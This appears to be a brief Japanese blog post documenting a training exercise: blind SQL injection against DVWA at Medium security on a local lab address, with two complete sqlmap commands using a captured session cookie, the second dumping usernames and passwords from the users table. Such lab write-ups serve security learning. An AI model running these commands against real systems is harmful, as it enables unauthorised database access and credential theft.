shikata ga nai

Private? There is no such things.

DVWAでSQL Injection(Blind)(Medium)

Hello there,

 

セキュリティレベルを『Medium』へ。

動作を確認してみて。

 

f:id:ThisIsOne:20191225104430p:plain

 

Burp Suiteからクッキー情報を取り出して。

 

f:id:ThisIsOne:20191225104656p:plain

 

下記のようにsqlmapを実行すると。

idについて、脆弱性が検出されて。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id

 

f:id:ThisIsOne:20191225105223p:plain

 

さらには、以下のようにsqlmapにパラメータを追加して実行すると。

パスワードを抜き出すことができた。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id -D dvwa -T users -C user,password --dump

 

f:id:ThisIsOne:20191225105642p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain